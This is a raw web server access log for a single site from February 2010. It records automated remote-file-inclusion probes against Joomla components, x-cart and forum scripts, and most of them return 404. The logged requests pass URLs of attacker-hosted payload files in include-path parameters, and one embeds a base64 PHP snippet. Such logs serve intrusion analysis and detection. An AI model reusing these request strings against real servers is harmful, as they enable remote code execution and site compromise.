219.94.193.152 - - [25/Feb/2010:08:15:23 -0800] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.94.193.152 - - [25/Feb/2010:08:15:23 -0800] "GET /logs/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.94.193.152 - - [25/Feb/2010:08:15:23 -0800] "GET /logs/access_100123.log%20%20/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.195.112.232 - - [25/Feb/2010:08:15:46 -0800] "GET /ideal/?S=D HTTP/1.0" 200 508 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.puaga.com"
83.103.72.130 - - [25/Feb/2010:08:15:51 -0800] "GET /become_editor.php?theme_path=http://www.airbrush.cl/airbrush/m2/content/geshi/.../icon/fxd?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
83.103.72.130 - - [25/Feb/2010:08:15:51 -0800] "GET /logs/become_editor.php?theme_path=http://www.airbrush.cl/airbrush/m2/content/geshi/.../icon/fxd?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
83.103.72.130 - - [25/Feb/2010:08:15:51 -0800] "GET /logs/access_100218.log/become_editor.php?theme_path=http://www.airbrush.cl/airbrush/m2/content/geshi/.../icon/fxd?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.94.193.152 - - [25/Feb/2010:08:16:04 -0800] "GET /logs/access_100217.log%20%20/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
83.103.72.130 - - [25/Feb/2010:08:16:06 -0800] "GET /logs/access_100203.log/become_editor.php?theme_path=http://www.airbrush.cl/airbrush/m2/content/geshi/.../icon/fxd?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [25/Feb/2010:08:16:15 -0800] "GET /logs/access_100131.log%20%20//errors.php?error=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [25/Feb/2010:08:16:15 -0800] "GET /errors.php?error=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [25/Feb/2010:08:16:15 -0800] "GET /logs//errors.php?error=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [25/Feb/2010:08:16:15 -0800] "GET /logs/access_100131.log%20%20//errors.php?error=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [25/Feb/2010:08:16:15 -0800] "GET /errors.php?error=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [25/Feb/2010:08:16:15 -0800] "GET /logs//errors.php?error=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [25/Feb/2010:08:16:21 -0800] "GET /errors.php?error=http://kortech.cn/bbs/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [25/Feb/2010:08:16:21 -0800] "GET /logs/access_100131.log/errors.php?error=http://kortech.cn/bbs/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [25/Feb/2010:08:16:21 -0800] "GET /logs/errors.php?error=http://kortech.cn/bbs/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.44.84.221 - - [25/Feb/2010:08:16:38 -0800] "GET /errors.php?error=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.44.84.221 - - [25/Feb/2010:08:16:38 -0800] "GET /logs/access_100131.log%20%20//errors.php?error=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.44.84.221 - - [25/Feb/2010:08:16:38 -0800] "GET /logs//errors.php?error=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.94.193.152 - - [25/Feb/2010:08:16:46 -0800] "GET /logs/access_100217.log%20%20/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [25/Feb/2010:08:17:46 -0800] "GET /logs/access_100129.log%20%20//errors.php?error=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [25/Feb/2010:08:18:04 -0800] "GET /errors.php?error=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [25/Feb/2010:08:18:04 -0800] "GET /logs/access_100118.log%20%20//errors.php?error=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [25/Feb/2010:08:18:04 -0800] "GET /logs//errors.php?error=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [25/Feb/2010:08:18:13 -0800] "GET /logs/access_100118.log%20%20//errors.php?error=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [25/Feb/2010:08:18:13 -0800] "GET /errors.php?error=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [25/Feb/2010:08:18:13 -0800] "GET /logs//errors.php?error=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
83.103.72.130 - - [25/Feb/2010:08:18:45 -0800] "GET /become_editor.php?theme_path=http://www.airbrush.cl/airbrush/m2/content/geshi/.../icon/fxd?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
83.103.72.130 - - [25/Feb/2010:08:18:46 -0800] "GET /logs/become_editor.php?theme_path=http://www.airbrush.cl/airbrush/m2/content/geshi/.../icon/fxd?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
83.103.72.130 - - [25/Feb/2010:08:18:46 -0800] "GET /logs/access_100218.log/become_editor.php?theme_path=http://www.airbrush.cl/airbrush/m2/content/geshi/.../icon/fxd?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
83.103.72.130 - - [25/Feb/2010:08:18:46 -0800] "GET /logs/access_100203.log/become_editor.php?theme_path=http://www.airbrush.cl/airbrush/m2/content/geshi/.../icon/fxd?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.44.84.221 - - [25/Feb/2010:08:18:50 -0800] "GET /logs/access_100129.log%20%20//errors.php?error=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.44.84.221 - - [25/Feb/2010:08:18:56 -0800] "GET /errors.php?error=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.44.84.221 - - [25/Feb/2010:08:18:56 -0800] "GET /logs/access_100131.log//errors.php?error=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.44.84.221 - - [25/Feb/2010:08:18:56 -0800] "GET /logs//errors.php?error=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [25/Feb/2010:08:19:30 -0800] "GET /logs/access_100131.log%20%20//errors.php?error=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
202.124.116.194 - - [25/Feb/2010:08:19:34 -0800] "GET /errors.php?error=http://kmgtusa.com/includes/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
202.124.116.194 - - [25/Feb/2010:08:19:34 -0800] "GET /logs/access_100131.log%20%20/errors.php?error=http://kmgtusa.com/includes/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
202.124.116.194 - - [25/Feb/2010:08:19:34 -0800] "GET /logs/errors.php?error=http://kmgtusa.com/includes/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [25/Feb/2010:08:19:39 -0800] "GET /logs/access_100131.log%20%20//errors.php?error=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.44.84.221 - - [25/Feb/2010:08:20:27 -0800] "GET /errors.php?error=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.44.84.221 - - [25/Feb/2010:08:20:27 -0800] "GET /logs//errors.php?error=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.44.84.221 - - [25/Feb/2010:08:20:27 -0800] "GET /logs/access_100118.log%20%20//errors.php?error=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.44.84.221 - - [25/Feb/2010:08:20:28 -0800] "GET /logs/access_100129.log//errors.php?error=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.119.103.16 - - [25/Feb/2010:08:20:29 -0800] "GET /administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.phimose-info.de/phimose-forum/Sources/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.119.103.16 - - [25/Feb/2010:08:20:30 -0800] "GET /logs/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.phimose-info.de/phimose-forum/Sources/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.119.103.16 - - [25/Feb/2010:08:20:30 -0800] "GET /logs/access_100219.log%20%20/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.phimose-info.de/phimose-forum/Sources/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.119.103.16 - - [25/Feb/2010:08:20:42 -0800] "GET /administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.phimose-info.de/phimose-forum/Sources/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.119.103.16 - - [25/Feb/2010:08:20:46 -0800] "GET /logs/access_100219.log%20%20/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.phimose-info.de/phimose-forum/Sources/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.44.84.221 - - [25/Feb/2010:08:21:52 -0800] "GET /logs/access_100214.log%20%20//errors.php?error=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.44.84.221 - - [25/Feb/2010:08:22:12 -0800] "GET /logs/access_100210.log//errors.php?error=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.44.84.221 - - [25/Feb/2010:08:22:12 -0800] "GET /logs//errors.php?error=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.119.103.16 - - [25/Feb/2010:08:24:03 -0800] "GET /logs/access_100123.log%20%20/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.phimose-info.de/phimose-forum/Sources/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
207.45.176.98 - - [25/Feb/2010:08:24:11 -0800] "GET /components/com_loudmounth/includes/abbc/abbc.clashttp://casapestagua.web-division.com/safeon.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.831" "www.puaga.com"
216.119.103.16 - - [25/Feb/2010:08:24:31 -0800] "GET /logs/access_100123.log%20%20/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.phimose-info.de/phimose-forum/Sources/id1.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [25/Feb/2010:08:24:48 -0800] "GET /logs/access_100123.log/?sourcedir=http://kortech.cn/bbs/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [25/Feb/2010:08:24:48 -0800] "GET /?sourcedir=http://kortech.cn/bbs/id1.txt? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [25/Feb/2010:08:24:49 -0800] "GET /logs/?sourcedir=http://kortech.cn/bbs/id1.txt? HTTP/1.1" 200 4942 "-" "Mozilla/5.0" "www.puaga.com"
118.98.223.162 - - [25/Feb/2010:08:25:23 -0800] "GET /comment_modify.php?dir=http://raimu.wen.ru/safe.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.808" "www.puaga.com"
80.97.64.32 - - [25/Feb/2010:08:28:05 -0800] "GET //administrator/components/com_mmp/help.mmp.php?mosConfig_absolute_path=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.97.64.32 - - [25/Feb/2010:08:28:05 -0800] "GET /logs///administrator/components/com_mmp/help.mmp.php?mosConfig_absolute_path=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.97.64.32 - - [25/Feb/2010:08:28:05 -0800] "GET /logs/access_091224.log///administrator/components/com_mmp/help.mmp.php?mosConfig_absolute_path=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.97.64.32 - - [25/Feb/2010:08:30:16 -0800] "GET //administrator/components/com_mmp/help.mmp.php?mosConfig_absolute_path=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.97.64.32 - - [25/Feb/2010:08:30:16 -0800] "GET /logs///administrator/components/com_mmp/help.mmp.php?mosConfig_absolute_path=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.97.64.32 - - [25/Feb/2010:08:30:21 -0800] "GET /logs/access_091224.log///administrator/components/com_mmp/help.mmp.php?mosConfig_absolute_path=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [25/Feb/2010:08:30:33 -0800] "GET /logs/access_100128.log%20%20//admin/auth.php?xcart_dir=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [25/Feb/2010:08:30:33 -0800] "GET /admin/auth.php?xcart_dir=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [25/Feb/2010:08:30:33 -0800] "GET /logs//admin/auth.php?xcart_dir=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [25/Feb/2010:08:30:44 -0800] "GET /logs/access_100118.log%20%20//admin/auth.php?xcart_dir=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.97.64.32 - - [25/Feb/2010:08:30:50 -0800] "GET /logs///administrator/components/com_mmp/help.mmp.php?mosConfig_absolute_path=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.97.64.32 - - [25/Feb/2010:08:30:50 -0800] "GET //administrator/components/com_mmp/help.mmp.php?mosConfig_absolute_path=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.97.64.32 - - [25/Feb/2010:08:30:50 -0800] "GET /logs/access_091224.log///administrator/components/com_mmp/help.mmp.php?mosConfig_absolute_path=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
207.45.176.98 - - [25/Feb/2010:08:31:36 -0800] "GET /logs/access_100205.log//components/com_loudmounth/includes/abbc/abbc.clashttp://casapestagua.web-division.com/safeon.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.831" "www.puaga.com"
207.45.176.98 - - [25/Feb/2010:08:31:37 -0800] "GET /components/com_loudmounth/includes/abbc/abbc.clashttp://casapestagua.web-division.com/safeon.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.831" "www.puaga.com"
207.45.176.98 - - [25/Feb/2010:08:31:37 -0800] "GET /logs//components/com_loudmounth/includes/abbc/abbc.clashttp://casapestagua.web-division.com/safeon.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.831" "www.puaga.com"
123.143.29.250 - - [25/Feb/2010:08:32:45 -0800] "GET /logs/access_100128.log//admin/auth.php?xcart_dir=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [25/Feb/2010:08:32:54 -0800] "GET /logs/access_100118.log//admin/auth.php?xcart_dir=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [25/Feb/2010:08:33:10 -0800] "GET /logs/access_100118.log%20%20//errors.php?dir=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [25/Feb/2010:08:33:10 -0800] "GET /logs//errors.php?dir=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [25/Feb/2010:08:33:12 -0800] "GET /error.php?error=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [25/Feb/2010:08:33:12 -0800] "GET /logs//error.php?error=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [25/Feb/2010:08:33:12 -0800] "GET /logs/access_100118.log%20%20//error.php?error=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [25/Feb/2010:08:33:13 -0800] "GET /errors.php?dir=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [25/Feb/2010:08:33:21 -0800] "GET /logs/access_100118.log%20%20//error.php?error=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [25/Feb/2010:08:33:21 -0800] "GET /error.php?error=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [25/Feb/2010:08:33:21 -0800] "GET /logs//error.php?error=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [25/Feb/2010:08:33:23 -0800] "GET /logs//errors.php?dir=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [25/Feb/2010:08:33:23 -0800] "GET /errors.php?dir=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [25/Feb/2010:08:33:23 -0800] "GET /logs/access_100118.log%20%20//errors.php?dir=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.97.64.32 - - [25/Feb/2010:08:33:36 -0800] "GET //administrator/components/com_mmp/help.mmp.php?mosConfig_absolute_path=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.97.64.32 - - [25/Feb/2010:08:33:36 -0800] "GET /logs///administrator/components/com_mmp/help.mmp.php?mosConfig_absolute_path=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.97.64.32 - - [25/Feb/2010:08:33:36 -0800] "GET /logs/access_091224.log///administrator/components/com_mmp/help.mmp.php?mosConfig_absolute_path=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [25/Feb/2010:08:34:28 -0800] "GET /logs/access_100131.log%20%20//errors.php?dir=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [25/Feb/2010:08:34:35 -0800] "GET /logs/access_100131.log%20%20//error.php?error=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [25/Feb/2010:08:34:40 -0800] "GET /logs/access_100131.log%20%20//error.php?error=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [25/Feb/2010:08:34:45 -0800] "GET /logs/access_100131.log%20%20//errors.php?dir=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
207.45.176.98 - - [25/Feb/2010:08:35:16 -0800] "GET /logs/access_100119.log//components/com_loudmounth/includes/abbc/abbc.clashttp://casapestagua.web-division.com/safeon.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.831" "www.puaga.com"
77.225.42.178 - - [25/Feb/2010:08:35:20 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.selman-motoren.de//administrator/components/com_virtuemart/Oid1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.225.42.178 - - [25/Feb/2010:08:35:20 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.selman-motoren.de//administrator/components/com_virtuemart/Oid1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.225.42.178 - - [25/Feb/2010:08:35:43 -0800] "GET /logs/access_100214.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.selman-motoren.de//administrator/components/com_virtuemart/Oid1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.225.42.178 - - [25/Feb/2010:08:35:59 -0800] "GET /logs/access_100130.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.selman-motoren.de//administrator/components/com_virtuemart/Oid1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.205.6.233 - - [25/Feb/2010:08:39:05 -0800] "GET /logs//components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=http://www.u-star.org/site/bbs/calendar/idxx.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.205.6.233 - - [25/Feb/2010:08:39:05 -0800] "GET /components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=http://www.u-star.org/site/bbs/calendar/idxx.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.205.6.233 - - [25/Feb/2010:08:39:05 -0800] "GET /logs/access_100219.log%20%20//components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=http://www.u-star.org/site/bbs/calendar/idxx.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.205.6.233 - - [25/Feb/2010:08:39:15 -0800] "GET /components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=http://www.u-star.org/site/bbs/calendar/idxx.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.205.6.233 - - [25/Feb/2010:08:39:15 -0800] "GET /logs//components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=http://www.u-star.org/site/bbs/calendar/idxx.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.205.6.233 - - [25/Feb/2010:08:39:15 -0800] "GET /logs/access_100219.log%20%20//components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=http://www.u-star.org/site/bbs/calendar/idxx.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.205.6.233 - - [25/Feb/2010:08:40:16 -0800] "GET /logs/access_100123.log%20%20//components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=http://www.u-star.org/site/bbs/calendar/idxx.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.205.6.233 - - [25/Feb/2010:08:40:18 -0800] "GET /logs/access_100123.log%20%20//components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=http://www.u-star.org/site/bbs/calendar/idxx.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.98.223.162 - - [25/Feb/2010:08:40:34 -0800] "GET /logs/access_100125.log//bbs///write_update.php/?board_skin_path=http://raimu.wen.ru/safe.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.808" "www.puaga.com"
118.98.223.162 - - [25/Feb/2010:08:40:35 -0800] "GET /logs//bbs///write_update.php/?board_skin_path=http://raimu.wen.ru/safe.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.808" "www.puaga.com"
202.124.116.194 - - [25/Feb/2010:08:42:34 -0800] "GET /include/print_category.php?setup[use_category]=1&dir=data:;base64,PD9waHBpbmZvKCk7Lyo=http://www.4bwd.com//images/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
202.124.116.194 - - [25/Feb/2010:08:42:34 -0800] "GET /logs/access_100119.log%20%20//include/print_category.php?setup[use_category]=1&dir=data:;base64,PD9waHBpbmZvKCk7Lyo=http://www.4bwd.com//images/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
202.124.116.194 - - [25/Feb/2010:08:42:34 -0800] "GET /logs//include/print_category.php?setup[use_category]=1&dir=data:;base64,PD9waHBpbmZvKCk7Lyo=http://www.4bwd.com//images/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
202.124.116.194 - - [25/Feb/2010:08:42:39 -0800] "GET /logs/access_100203.log%20%20//include/print_category.php?setup[use_category]=1&dir=data:;base64,PD9waHBpbmZvKCk7Lyo=http://www.4bwd.com//images/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [25/Feb/2010:08:47:32 -0800] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [25/Feb/2010:08:47:32 -0800] "GET /components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [25/Feb/2010:08:47:32 -0800] "GET /logs/access_100129.log%20%20//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
